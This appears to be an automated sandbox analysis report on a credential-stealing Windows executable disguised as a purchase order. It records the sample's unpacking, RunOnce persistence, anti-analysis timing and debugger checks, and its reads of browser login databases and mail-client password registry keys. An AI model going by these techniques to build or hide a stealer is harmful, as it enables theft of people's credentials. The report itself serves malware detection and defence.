Source: C:\Users\user\Desktop\Purchase-Order27112024.scr.exe | Section loaded: uxtheme.dll
Source: C:\Users\user\Desktop\Purchase-Order27112024.scr.exe | Section loaded: shfolder.dll
Source: C:\Users\user\Desktop\Purchase-Order27112024.scr.exe | Section loaded: windows.storage.dll
Source: C:\Users\user\Desktop\Purchase-Order27112024.scr.exe | Section loaded: wldp.dll
Source: C:\Users\user\Desktop\Purchase-Order27112024.scr.exe | Section loaded: propsys.dll
Source: C:\Users\user\Desktop\Purchase-Order27112024.scr.exe | Section loaded: riched20.dll
Source: C:\Users\user\Desktop\Purchase-Order27112024.scr.exe | Section loaded: usp10.dll
Source: C:\Users\user\Desktop\Purchase-Order27112024.scr.exe | Section loaded: msls31.dll
Source: C:\Users\user\Desktop\Purchase-Order27112024.scr.exe | Section loaded: textinputframework.dll
Source: C:\Users\user\Desktop\Purchase-Order27112024.scr.exe | Section loaded: coreuicomponents.dll
Source: C:\Users\user\Desktop\Purchase-Order27112024.scr.exe | Section loaded: coremessaging.dll
Source: C:\Users\user\Desktop\Purchase-Order27112024.scr.exe | Section loaded: ntmarta.dll
Source: C:\Users\user\Desktop\Purchase-Order27112024.scr.exe | Section loaded: wintypes.dll
Source: C:\Users\user\Desktop\Purchase-Order27112024.scr.exe | Section loaded: wintypes.dll
Source: C:\Users\user\Desktop\Purchase-Order27112024.scr.exe | Section loaded: wintypes.dll
Source: C:\Users\user\Desktop\Purchase-Order27112024.scr.exe | Section loaded: textshaping.dll
Source: C:\Users\user\Desktop\Purchase-Order27112024.scr.exe | Section loaded: version.dll
Source: C:\Users\user\Desktop\Purchase-Order27112024.scr.exe | Section loaded: windows.storage.dll
Source: C:\Users\user\Desktop\Purchase-Order27112024.scr.exe | Section loaded: wldp.dll
Source: C:\Users\user\Desktop\Purchase-Order27112024.scr.exe | Section loaded: kernel.appcore.dll
Source: C:\Users\user\Desktop\Purchase-Order27112024.scr.exe | Section loaded: uxtheme.dll
Source: C:\Users\user\Desktop\Purchase-Order27112024.scr.exe | Section loaded: wininet.dll
            Source: C:\Users\user\Desktop\Purchase-Order27112024.scr.exeSection loaded: iertutil.dllJump to behavior
            Source: C:\Users\user\Desktop\Purchase-Order27112024.scr.exeSection loaded: sspicli.dllJump to behavior
            Source: C:\Users\user\Desktop\Purchase-Order27112024.scr.exeSection loaded: profapi.dllJump to behavior
            Source: C:\Users\user\Desktop\Purchase-Order27112024.scr.exeSection loaded: ondemandconnroutehelper.dllJump to behavior
            Source: C:\Users\user\Desktop\Purchase-Order27112024.scr.exeSection loaded: winhttp.dllJump to behavior
            Source: C:\Users\user\Desktop\Purchase-Order27112024.scr.exeSection loaded: iphlpapi.dllJump to behavior
            Source: C:\Users\user\Desktop\Purchase-Order27112024.scr.exeSection loaded: mswsock.dllJump to behavior
            Source: C:\Users\user\Desktop\Purchase-Order27112024.scr.exeSection loaded: winnsi.dllJump to behavior
            Source: C:\Users\user\Desktop\Purchase-Order27112024.scr.exeSection loaded: urlmon.dllJump to behavior
            Source: C:\Users\user\Desktop\Purchase-Order27112024.scr.exeSection loaded: srvcli.dllJump to behavior
            Source: C:\Users\user\Desktop\Purchase-Order27112024.scr.exeSection loaded: netutils.dllJump to behavior
            Source: C:\Users\user\Desktop\Purchase-Order27112024.scr.exeSection loaded: dnsapi.dllJump to behavior
            Source: C:\Users\user\Desktop\Purchase-Order27112024.scr.exeSection loaded: rasadhlp.dllJump to behavior
            Source: C:\Users\user\Desktop\Purchase-Order27112024.scr.exeSection loaded: fwpuclnt.dllJump to behavior
            Source: C:\Users\user\Desktop\Purchase-Order27112024.scr.exeSection loaded: schannel.dllJump to behavior
            Source: C:\Users\user\Desktop\Purchase-Order27112024.scr.exeSection loaded: mskeyprotect.dllJump to behavior
            Source: C:\Users\user\Desktop\Purchase-Order27112024.scr.exeSection loaded: ntasn1.dllJump to behavior
            Source: C:\Users\user\Desktop\Purchase-Order27112024.scr.exeSection loaded: msasn1.dllJump to behavior
            Source: C:\Users\user\Desktop\Purchase-Order27112024.scr.exeSection loaded: dpapi.dllJump to behavior
            Source: C:\Users\user\Desktop\Purchase-Order27112024.scr.exeSection loaded: cryptsp.dllJump to behavior
            Source: C:\Users\user\Desktop\Purchase-Order27112024.scr.exeSection loaded: rsaenh.dllJump to behavior
            Source: C:\Users\user\Desktop\Purchase-Order27112024.scr.exeSection loaded: cryptbase.dllJump to behavior
            Source: C:\Users\user\Desktop\Purchase-Order27112024.scr.exeSection loaded: gpapi.dllJump to behavior
            Source: C:\Users\user\Desktop\Purchase-Order27112024.scr.exeSection loaded: ncrypt.dllJump to behavior
            Source: C:\Users\user\Desktop\Purchase-Order27112024.scr.exeSection loaded: ncryptsslp.dllJump to behavior
            Source: C:\Users\user\Desktop\Purchase-Order27112024.scr.exeSection loaded: winmm.dllJump to behavior
            Source: C:\Users\user\Desktop\Purchase-Order27112024.scr.exeSection loaded: version.dllJump to behavior
            Source: C:\Users\user\Desktop\Purchase-Order27112024.scr.exeSection loaded: wininet.dllJump to behavior
            Source: C:\Users\user\Desktop\Purchase-Order27112024.scr.exeSection loaded: windows.storage.dllJump to behavior
            Source: C:\Users\user\Desktop\Purchase-Order27112024.scr.exeSection loaded: wldp.dllJump to behavior
            Source: C:\Users\user\Desktop\Purchase-Order27112024.scr.exeSection loaded: cryptsp.dllJump to behavior
            Source: C:\Users\user\Desktop\Purchase-Order27112024.scr.exeSection loaded: rsaenh.dllJump to behavior
            Source: C:\Users\user\Desktop\Purchase-Order27112024.scr.exeSection loaded: cryptbase.dllJump to behavior
            Source: C:\Users\user\Desktop\Purchase-Order27112024.scr.exeSection loaded: pstorec.dllJump to behavior
            Source: C:\Users\user\Desktop\Purchase-Order27112024.scr.exeSection loaded: vaultcli.dllJump to behavior
            Source: C:\Users\user\Desktop\Purchase-Order27112024.scr.exeSection loaded: wintypes.dllJump to behavior
            Source: C:\Users\user\Desktop\Purchase-Order27112024.scr.exeSection loaded: dpapi.dllJump to behavior
            Source: C:\Users\user\Desktop\Purchase-Order27112024.scr.exeSection loaded: msasn1.dllJump to behavior
            Source: C:\Users\user\Desktop\Purchase-Order27112024.scr.exeSection loaded: windows.storage.dllJump to behavior
            Source: C:\Users\user\Desktop\Purchase-Order27112024.scr.exeSection loaded: wldp.dllJump to behavior
            Source: C:\Users\user\Desktop\Purchase-Order27112024.scr.exeSection loaded: pstorec.dllJump to behavior
            Source: C:\Users\user\Desktop\Purchase-Order27112024.scr.exeSection loaded: sspicli.dllJump to behavior
            Source: C:\Users\user\Desktop\Purchase-Order27112024.scr.exeSection loaded: msasn1.dllJump to behavior
            Source: C:\Users\user\Desktop\Purchase-Order27112024.scr.exeSection loaded: msasn1.dllJump to behavior
            Source: C:\Users\user\Desktop\Purchase-Order27112024.scr.exeSection loaded: windows.storage.dllJump to behavior
            Source: C:\Users\user\Desktop\Purchase-Order27112024.scr.exeSection loaded: wldp.dllJump to behavior
            Source: C:\Users\user\Desktop\Purchase-Order27112024.scr.exeSection loaded: msasn1.dllJump to behavior
            Source: C:\Users\user\Desktop\Purchase-Order27112024.scr.exeSection loaded: sspicli.dllJump to behavior
            Source: C:\Users\user\Desktop\Purchase-Order27112024.scr.exeSection loaded: cryptsp.dllJump to behavior
            Source: C:\Users\user\Desktop\Purchase-Order27112024.scr.exeSection loaded: rsaenh.dllJump to behavior
            Source: C:\Users\user\Desktop\Purchase-Order27112024.scr.exeSection loaded: cryptbase.dllJump to behavior
            Source: C:\Users\user\Desktop\Purchase-Order27112024.scr.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{1f486a52-3cb1-48fd-8f50-b8dc300d9f9d}\InProcServer32Jump to behavior
            Source: C:\Users\user\Desktop\Purchase-Order27112024.scr.exeFile written: C:\Users\user\AppData\Local\Temp\tmc.iniJump to behavior
            Source: C:\Users\user\Desktop\Purchase-Order27112024.scr.exeFile opened: C:\Users\user\Desktop\Purchase-Order27112024.scr.cfgJump to behavior
            Source: C:\Users\user\Desktop\Purchase-Order27112024.scr.exeKey opened: HKEY_CURRENT_USER\Software\Microsoft\Office\Outlook\OMI Account Manager\AccountsJump to behavior
            Source: Purchase-Order27112024.scr.exeStatic PE information: DYNAMIC_BASE, NX_COMPAT, NO_SEH, TERMINAL_SERVER_AWARE

            Data Obfuscation

            Source: C:\Users\user\Desktop\Purchase-Order27112024.scr.exe | Unpacked PE file: 6.2.Purchase-Order27112024.scr.exe.400000.0.unpack .text:ER;.rdata:R;.data:W;.ndata:W;.rsrc:R; vs .MPRESS1:ER;.MPRESS2:ER;.rsrc:W;
            Source: C:\Users\user\Desktop\Purchase-Order27112024.scr.exe | Unpacked PE file: 7.2.Purchase-Order27112024.scr.exe.400000.0.unpack .text:ER;.rdata:R;.data:W;.ndata:W;.rsrc:R; vs .MPRESS1:ER;.MPRESS2:ER;.rsrc:W;
            Source: C:\Users\user\Desktop\Purchase-Order27112024.scr.exe | Unpacked PE file: 8.2.Purchase-Order27112024.scr.exe.400000.0.unpack .text:ER;.rdata:R;.data:W;.ndata:W;.rsrc:R; vs .MPRESS1:ER;.MPRESS2:ER;.rsrc:W;
            Source: Yara match | File source: 00000000.00000002.2227487287.000000000872C000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY
            Source: C:\Users\user\Desktop\Purchase-Order27112024.scr.exe | Code function: 0_2_004062B2 GetModuleHandleA,LoadLibraryA,GetProcAddress, 0_2_004062B2
            Source: C:\Users\user\Desktop\Purchase-Order27112024.scr.exe | Code function: 0_2_10002DE0 push eax; ret 0_2_10002E0E
            Source: C:\Users\user\Desktop\Purchase-Order27112024.scr.exe | Code function: 2_2_37002806 push ecx; ret 2_2_37002819
            Source: C:\Users\user\Desktop\Purchase-Order27112024.scr.exe | Code function: 6_2_0044693D push ecx; ret 6_2_0044694D
            Source: C:\Users\user\Desktop\Purchase-Order27112024.scr.exe | Code function: 6_2_0044DB70 push eax; ret 6_2_0044DB84
            Source: C:\Users\user\Desktop\Purchase-Order27112024.scr.exe | Code function: 6_2_0044DB70 push eax; ret 6_2_0044DBAC
            Source: C:\Users\user\Desktop\Purchase-Order27112024.scr.exe | Code function: 6_2_00451D54 push eax; ret 6_2_00451D61
            Source: C:\Users\user\Desktop\Purchase-Order27112024.scr.exe | Code function: 7_2_0044B090 push eax; ret 7_2_0044B0A4
            Source: C:\Users\user\Desktop\Purchase-Order27112024.scr.exe | Code function: 7_2_0044B090 push eax; ret 7_2_0044B0CC
            Source: C:\Users\user\Desktop\Purchase-Order27112024.scr.exe | Code function: 7_2_00451D34 push eax; ret 7_2_00451D41
            Source: C:\Users\user\Desktop\Purchase-Order27112024.scr.exe | Code function: 7_2_00444E71 push ecx; ret 7_2_00444E81
            Source: C:\Users\user\Desktop\Purchase-Order27112024.scr.exe | Code function: 8_2_00414060 push eax; ret 8_2_00414074
            Source: C:\Users\user\Desktop\Purchase-Order27112024.scr.exe | Code function: 8_2_00414060 push eax; ret 8_2_0041409C
            Source: C:\Users\user\Desktop\Purchase-Order27112024.scr.exe | Code function: 8_2_00414039 push ecx; ret 8_2_00414049
            Source: C:\Users\user\Desktop\Purchase-Order27112024.scr.exe | Code function: 8_2_004164EB push 0000006Ah; retf 8_2_004165C4
            Source: C:\Users\user\Desktop\Purchase-Order27112024.scr.exe | Code function: 8_2_00416553 push 0000006Ah; retf 8_2_004165C4
            Source: C:\Users\user\Desktop\Purchase-Order27112024.scr.exe | Code function: 8_2_00416555 push 0000006Ah; retf 8_2_004165C4

            Persistence and Installation Behavior

            Source: C:\Users\user\Desktop\Purchase-Order27112024.scr.exe | File created: C:\Users\user\AppData\Local\Temp\subfolder1\Perissodactylic.scr
            Source: C:\Users\user\Desktop\Purchase-Order27112024.scr.exe | File created: C:\Users\user\AppData\Local\Temp\nsl791D.tmp\System.dll
            Source: C:\Users\user\Desktop\Purchase-Order27112024.scr.exe | File created: C:\Users\user\AppData\Local\Temp\subfolder1\Perissodactylic.scr

            Boot Survival

            Source: C:\Users\user\Desktop\Purchase-Order27112024.scr.exe | Registry value created or modified: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\RunOnce Startup key C:\Users\user\AppData\Local\Temp\subfolder1\Perissodactylic.scr
            Source: C:\Users\user\Desktop\Purchase-Order27112024.scr.exe | Registry value created or modified: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\RunOnce Startup key C:\Users\user\AppData\Local\Temp\subfolder1\Perissodactylic.scr
            Source: C:\Users\user\Desktop\Purchase-Order27112024.scr.exe | Registry value created or modified: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\RunOnce Startup key
            Source: C:\Users\user\Desktop\Purchase-Order27112024.scr.exe | Registry value created or modified: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\RunOnce Startup key
            Source: C:\Users\user\Desktop\Purchase-Order27112024.scr.exe | Registry value created or modified: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\RunOnce Startup key
            Source: C:\Users\user\Desktop\Purchase-Order27112024.scr.exe | Registry value created or modified: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\RunOnce Startup key
            Source: C:\Users\user\Desktop\Purchase-Order27112024.scr.exe | Code function: 7_2_004047CB LoadLibraryA,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress, 7_2_004047CB
            Source: C:\Users\user\Desktop\Purchase-Order27112024.scr.exe | Process information set: NOOPENFILEERRORBOX
            Source: C:\Users\user\Desktop\Purchase-Order27112024.scr.exe | Process information set: NOOPENFILEERRORBOX
            Source: C:\Users\user\Desktop\Purchase-Order27112024.scr.exe | Process information set: NOOPENFILEERRORBOX
            Source: C:\Users\user\Desktop\Purchase-Order27112024.scr.exe | Process information set: NOOPENFILEERRORBOX
            Source: C:\Users\user\Desktop\Purchase-Order27112024.scr.exe | Process information set: NOOPENFILEERRORBOX
            Source: C:\Users\user\Desktop\Purchase-Order27112024.scr.exe | Process information set: NOOPENFILEERRORBOX
            Source: C:\Users\user\Desktop\Purchase-Order27112024.scr.exe | Process information set: NOOPENFILEERRORBOX
            Source: C:\Users\user\Desktop\Purchase-Order27112024.scr.exe | Process information set: NOOPENFILEERRORBOX
            Source: C:\Users\user\Desktop\Purchase-Order27112024.scr.exe | Process information set: NOOPENFILEERRORBOX
            Source: C:\Users\user\Desktop\Purchase-Order27112024.scr.exe | Process information set: NOOPENFILEERRORBOX
            Source: C:\Users\user\Desktop\Purchase-Order27112024.scr.exe | Process information set: NOOPENFILEERRORBOX
            Source: C:\Users\user\Desktop\Purchase-Order27112024.scr.exe | Process information set: NOOPENFILEERRORBOX
            Source: C:\Users\user\Desktop\Purchase-Order27112024.scr.exe | Process information set: NOOPENFILEERRORBOX
            Source: C:\Users\user\Desktop\Purchase-Order27112024.scr.exe | Process information set: NOOPENFILEERRORBOX

            Malware Analysis System Evasion

            Source: C:\Users\user\Desktop\Purchase-Order27112024.scr.exe | API/Special instruction interceptor: Address: 8F38F0A
            Source: C:\Users\user\Desktop\Purchase-Order27112024.scr.exe | API/Special instruction interceptor: Address: 5BF8F0A
            Source: C:\Users\user\Desktop\Purchase-Order27112024.scr.exe | RDTSC instruction interceptor: First address: 8EF7248 second address: 8EF7248 instructions: 0x00000000 rdtsc 0x00000002 test bx, cx 0x00000005 cmp ebx, ecx 0x00000007 jc 00007F8A8CEAF247h 0x00000009 push esi 0x0000000a mov esi, 3F0164E7h 0x0000000f cmp esi, 2Fh 0x00000012 jl 00007F8A8CEF1B12h 0x00000018 pop esi 0x00000019 inc ebp 0x0000001a inc ebx 0x0000001b rdtsc
            Source: C:\Users\user\Desktop\Purchase-Order27112024.scr.exe | RDTSC instruction interceptor: First address: 5BB7248 second address: 5BB7248 instructions: 0x00000000 rdtsc 0x00000002 test bx, cx 0x00000005 cmp ebx, ecx 0x00000007 jc 00007F8A8CFED887h 0x00000009 push esi 0x0000000a mov esi, 3F0164E7h 0x0000000f cmp esi, 2Fh 0x00000012 jl 00007F8A8D030152h 0x00000018 pop esi 0x00000019 inc ebp 0x0000001a inc ebx 0x0000001b rdtsc
            Source: C:\Users\user\Desktop\Purchase-Order27112024.scr.exe | Code function: 6_2_0040DD85 memset,CreateFileW,NtQuerySystemInformation,NtQuerySystemInformation,CloseHandle,GetCurrentProcessId,_wcsicmp,_wcsicmp,_wcsicmp,OpenProcess,GetCurrentProcess,DuplicateHandle,memset,NtQueryObject,CloseHandle,_wcsicmp,CloseHandle, 6_2_0040DD85
            Source: C:\Users\user\Desktop\Purchase-Order27112024.scr.exe | Window / User API: threadDelayed 1099
            Source: C:\Users\user\Desktop\Purchase-Order27112024.scr.exe | Window / User API: threadDelayed 8886
            Source: C:\Users\user\Desktop\Purchase-Order27112024.scr.exe | Dropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\nsl791D.tmp\System.dll
            Source: C:\Users\user\Desktop\Purchase-Order27112024.scr.exe | API coverage: 4.3 %
            Source: C:\Users\user\Desktop\Purchase-Order27112024.scr.exe | API coverage: 9.9 %
            Source: C:\Users\user\Desktop\Purchase-Order27112024.scr.exe TID: 4600 | Thread sleep count: 1099 > 30
            Source: C:\Users\user\Desktop\Purchase-Order27112024.scr.exe TID: 4600 | Thread sleep time: -3297000s >= -30000s
            Source: C:\Users\user\Desktop\Purchase-Order27112024.scr.exe TID: 4600 | Thread sleep count: 8886 > 30
            Source: C:\Users\user\Desktop\Purchase-Order27112024.scr.exe TID: 4600 | Thread sleep time: -26658000s >= -30000s
            Source: C:\Users\user\Desktop\Purchase-Order27112024.scr.exe | Code function: 0_2_004057D0 CloseHandle,DeleteFileW,lstrcatW,lstrcatW,lstrlenW,FindFirstFileW,FindNextFileW,FindClose, 0_2_004057D0
            Source: C:\Users\user\Desktop\Purchase-Order27112024.scr.exe | Code function: 0_2_0040628B FindFirstFileW,FindClose, 0_2_0040628B
            Source: C:\Users\user\Desktop\Purchase-Order27112024.scr.exe | Code function: 0_2_00402770 FindFirstFileW, 0_2_00402770
            Source: C:\Users\user\Desktop\Purchase-Order27112024.scr.exe | Code function: 2_2_00402770 FindFirstFileW, 2_2_00402770
            Source: C:\Users\user\Desktop\Purchase-Order27112024.scr.exe | Code function: 2_2_004057D0 CloseHandle,DeleteFileW,lstrcatW,lstrcatW,lstrlenW,FindFirstFileW,FindNextFileW,FindClose, 2_2_004057D0
            Source: C:\Users\user\Desktop\Purchase-Order27112024.scr.exe | Code function: 2_2_0040628B FindFirstFileW,FindClose, 2_2_0040628B
            Source: C:\Users\user\Desktop\Purchase-Order27112024.scr.exe | Code function: 2_2_370010F1 lstrlenW,lstrlenW,lstrcatW,lstrlenW,lstrlenW,lstrlenW,FindFirstFileW,FindNextFileW,FindClose, 2_2_370010F1
            Source: C:\Users\user\Desktop\Purchase-Order27112024.scr.exe | Code function: 2_2_37006580 FindFirstFileExA, 2_2_37006580
            Source: C:\Users\user\Desktop\Purchase-Order27112024.scr.exe | Code function: 6_2_0040AE51 FindFirstFileW,FindNextFileW, 6_2_0040AE51
            Source: C:\Users\user\Desktop\Purchase-Order27112024.scr.exe | Code function: 7_2_00407EF8 FindFirstFileA,FindNextFileA,strlen,strlen, 7_2_00407EF8
            Source: C:\Users\user\Desktop\Purchase-Order27112024.scr.exe | Code function: 8_2_00407898 FindFirstFileA,FindNextFileA,strlen,strlen, 8_2_00407898
            Source: C:\Users\user\Desktop\Purchase-Order27112024.scr.exe | Code function: 6_2_00418981 memset,GetSystemInfo, 6_2_00418981
            Source: Purchase-Order27112024.scr.exe, 00000002.00000002.4579842444.0000000006402000.00000004.00000020.00020000.00000000.sdmp, Purchase-Order27112024.scr.exe, 00000002.00000002.4579842444.00000000063D1000.00000004.00000020.00020000.00000000.sdmp | Binary or memory string: Hyper-V RAW
            Source: Purchase-Order27112024.scr.exe, 00000002.00000002.4579842444.0000000006402000.00000004.00000020.00020000.00000000.sdmp | Binary or memory string: Hyper-V RAWindows\system32\en-GB\mswsock.dll.mui
            Source: bhv2E52.tmp.6.dr | Binary or memory string: https://r.bing.com/rb/18/jnc,nj/6hU_LneafI_NFLeDvM367ebFaKQ.js?bu=Dx0ma3d6fXRucbIBtQEmpQEmuAE&or=w
            Source: C:\Users\user\Desktop\Purchase-Order27112024.scr.exe | API call chain: ExitProcess graph end node graph_0-4739
            Source: C:\Users\user\Desktop\Purchase-Order27112024.scr.exe | API call chain: ExitProcess graph end node graph_0-4740
            Source: C:\Users\user\Desktop\Purchase-Order27112024.scr.exe | API call chain: ExitProcess graph end node graph_7-34119
            Source: C:\Users\user\Desktop\Purchase-Order27112024.scr.exe | Process information queried: ProcessInformation
            Source: C:\Users\user\Desktop\Purchase-Order27112024.scr.exe | Code function: 2_2_37002639 IsProcessorFeaturePresent,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter, 2_2_37002639
            Source: C:\Users\user\Desktop\Purchase-Order27112024.scr.exe | Code function: 6_2_0040DD85 memset,CreateFileW,NtQuerySystemInformation,NtQuerySystemInformation,CloseHandle,GetCurrentProcessId,_wcsicmp,_wcsicmp,_wcsicmp,OpenProcess,GetCurrentProcess,DuplicateHandle,memset,NtQueryObject,CloseHandle,_wcsicmp,CloseHandle, 6_2_0040DD85
            Source: C:\Users\user\Desktop\Purchase-Order27112024.scr.exe | Code function: 0_2_004062B2 GetModuleHandleA,LoadLibraryA,GetProcAddress, 0_2_004062B2
            Source: C:\Users\user\Desktop\Purchase-Order27112024.scr.exe | Code function: 2_2_37004AB4 mov eax, dword ptr fs:[00000030h] 2_2_37004AB4
            Source: C:\Users\user\Desktop\Purchase-Order27112024.scr.exe | Code function: 2_2_3700724E GetProcessHeap, 2_2_3700724E
            Source: C:\Users\user\Desktop\Purchase-Order27112024.scr.exe | Process token adjusted: Debug
            Source: C:\Users\user\Desktop\Purchase-Order27112024.scr.exe | Code function: 2_2_37002B1C SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess, 2_2_37002B1C
            Source: C:\Users\user\Desktop\Purchase-Order27112024.scr.exe | Code function: 2_2_37002639 IsProcessorFeaturePresent,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter, 2_2_37002639
            Source: C:\Users\user\Desktop\Purchase-Order27112024.scr.exe | Code function: 2_2_370060E2 IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter, 2_2_370060E2

            HIPS / PFW / Operating System Protection Evasion

            Source: C:\Users\user\Desktop\Purchase-Order27112024.scr.exe | Section loaded: NULL target: C:\Users\user\Desktop\Purchase-Order27112024.scr.exe protection: execute and read and write
            Source: C:\Users\user\Desktop\Purchase-Order27112024.scr.exe | Section loaded: NULL target: C:\Users\user\Desktop\Purchase-Order27112024.scr.exe protection: execute and read and write
            Source: C:\Users\user\Desktop\Purchase-Order27112024.scr.exe | Section loaded: NULL target: C:\Users\user\Desktop\Purchase-Order27112024.scr.exe protection: execute and read and write
            Source: C:\Users\user\Desktop\Purchase-Order27112024.scr.exe | Process created: C:\Users\user\Desktop\Purchase-Order27112024.scr.exe "C:\Users\user\Desktop\Purchase-Order27112024.scr.exe"
            Source: C:\Users\user\Desktop\Purchase-Order27112024.scr.exe | Process created: C:\Users\user\Desktop\Purchase-Order27112024.scr.exe C:\Users\user\Desktop\Purchase-Order27112024.scr.exe /stext "C:\Users\user\AppData\Local\Temp\lpbpuoswhxqpduzrodqpwzbywtn"
            Source: C:\Users\user\Desktop\Purchase-Order27112024.scr.exe | Process created: C:\Users\user\Desktop\Purchase-Order27112024.scr.exe C:\Users\user\Desktop\Purchase-Order27112024.scr.exe /stext "C:\Users\user\AppData\Local\Temp\njgavgdycficoinvfolrymwhxifwkll"
            Source: C:\Users\user\Desktop\Purchase-Order27112024.scr.exe | Process created: C:\Users\user\Desktop\Purchase-Order27112024.scr.exe C:\Users\user\Desktop\Purchase-Order27112024.scr.exe /stext "C:\Users\user\AppData\Local\Temp\xlmtozosqnagqojhoyykjqqygopfdwcbcs"
            Source: Purchase-Order27112024.scr.exe, 00000002.00000002.4579842444.00000000063E6000.00000004.00000020.00020000.00000000.sdmp | Binary or memory string: Program Manager
            Source: Purchase-Order27112024.scr.exe, 00000002.00000002.4580003040.0000000006415000.00000004.00000020.00020000.00000000.sdmp, Purchase-Order27112024.scr.exe, 00000002.00000003.2556975823.000000000641B000.00000004.00000020.00020000.00000000.sdmp, Purchase-Order27112024.scr.exe, 00000002.00000003.2541293582.000000000641B000.00000004.00000020.00020000.00000000.sdmp | Binary or memory string: |Program Manager|
            Source: Purchase-Order27112024.scr.exe, 00000002.00000002.4579842444.00000000063E6000.00000004.00000020.00020000.00000000.sdmp | Binary or memory string: Program Manager4L>
            Source: C:\Users\user\Desktop\Purchase-Order27112024.scr.exe | Code function: 2_2_37002933 cpuid 2_2_37002933
            Source: C:\Users\user\Desktop\Purchase-Order27112024.scr.exe | Queries volume information: C:\ VolumeInformation
            Source: C:\Users\user\Desktop\Purchase-Order27112024.scr.exe | Code function: 2_2_37002264 GetSystemTimeAsFileTime,GetCurrentThreadId,GetCurrentProcessId,QueryPerformanceCounter, 2_2_37002264
            Source: C:\Users\user\Desktop\Purchase-Order27112024.scr.exe | Code function: 7_2_004082CD memset,memset,memset,memset,GetComputerNameA,GetUserNameA,MultiByteToWideChar,MultiByteToWideChar,MultiByteToWideChar,strlen,strlen,memcpy, 7_2_004082CD
            Source: C:\Users\user\Desktop\Purchase-Order27112024.scr.exe | Code function: 0_2_00405F6A GetVersion,GetSystemDirectoryW,GetWindowsDirectoryW,SHGetSpecialFolderLocation,SHGetPathFromIDListW,CoTaskMemFree,lstrcatW,lstrlenW, 0_2_00405F6A
            Source: C:\Users\user\Desktop\Purchase-Order27112024.scr.exe | Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuid

            Stealing of Sensitive Information

            Source: Yara match | File source: 00000002.00000003.2541293582.000000000641B000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
            Source: Yara match | File source: 00000002.00000002.4580003040.0000000006415000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
            Source: Yara match | File source: 00000002.00000003.2556975823.000000000641B000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
            Source: Yara match | File source: 00000002.00000002.4579842444.00000000063E6000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
            Source: Yara match | File source: 00000002.00000003.2541332052.000000000641B000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
            Source: Yara match | File source: Process Memory Space: Purchase-Order27112024.scr.exe PID: 4892, type: MEMORYSTR
            Source: C:\Users\user\Desktop\Purchase-Order27112024.scr.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Login Data
            Source: C:\Users\user\Desktop\Purchase-Order27112024.scr.exe | File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\profiles.ini
            Source: C:\Users\user\Desktop\Purchase-Order27112024.scr.exe | File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\2o7hffxt.default-release\places.sqlite
            Source: C:\Users\user\Desktop\Purchase-Order27112024.scr.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Web Data
            Source: C:\Users\user\Desktop\Purchase-Order27112024.scr.exe | File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\2o7hffxt.default-release\key4.db
            Source: C:\Users\user\Desktop\Purchase-Order27112024.scr.exe | File opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Login Data
            Source: C:\Users\user\Desktop\Purchase-Order27112024.scr.exe | Key opened: HKEY_CURRENT_USER\Software\Google\Google Talk\Accounts
            Source: C:\Users\user\Desktop\Purchase-Order27112024.scr.exe | Key opened: HKEY_CURRENT_USER\SOFTWARE\Microsoft\IdentityCRL\Dynamic Salt
            Source: C:\Users\user\Desktop\Purchase-Order27112024.scr.exe | Key opened: HKEY_CURRENT_USER\SOFTWARE\Microsoft\IdentityCRL\Dynamic Salt
            Source: C:\Users\user\Desktop\Purchase-Order27112024.scr.exe | Key opened: HKEY_CURRENT_USER\Software\Google\Google Talk\Accounts
            Source: C:\Users\user\Desktop\Purchase-Order27112024.scr.exe | Key opened: HKEY_CURRENT_USER\Software\Paltalk
            Source: C:\Users\user\Desktop\Purchase-Order27112024.scr.exe | Key opened: HKEY_CURRENT_USER\Software\Microsoft\Office\Outlook\OMI Account Manager\Accounts
            Source: C:\Users\user\Desktop\Purchase-Order27112024.scr.exe | Key opened: HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles
            Source: C:\Users\user\Desktop\Purchase-Order27112024.scr.exe | Key opened: HKEY_CURRENT_USER\Software\IncrediMail\Identities
            Source: C:\Users\user\Desktop\Purchase-Order27112024.scr.exe | Key opened: HKEY_CURRENT_USER\Software\Microsoft\Windows Live Mail
            Source: C:\Users\user\Desktop\Purchase-Order27112024.scr.exe | Code function: ESMTPPassword 7_2_004033F0
            Source: C:\Users\user\Desktop\Purchase-Order27112024.scr.exe | Code function: _mbscpy,_mbscpy,_mbscpy,_mbscpy,RegCloseKey, PopPassword 7_2_00402DB3
            Source: C:\Users\user\Desktop\Purchase-Order27112024.scr.exe | Code function: _mbscpy,_mbscpy,_mbscpy,_mbscpy,RegCloseKey, SMTPPassword 7_2_00402DB3
            Source: Yara match | File source: Process Memory Space: Purchase-Order27112024.scr.exe PID: 4892, type: MEMORYSTR
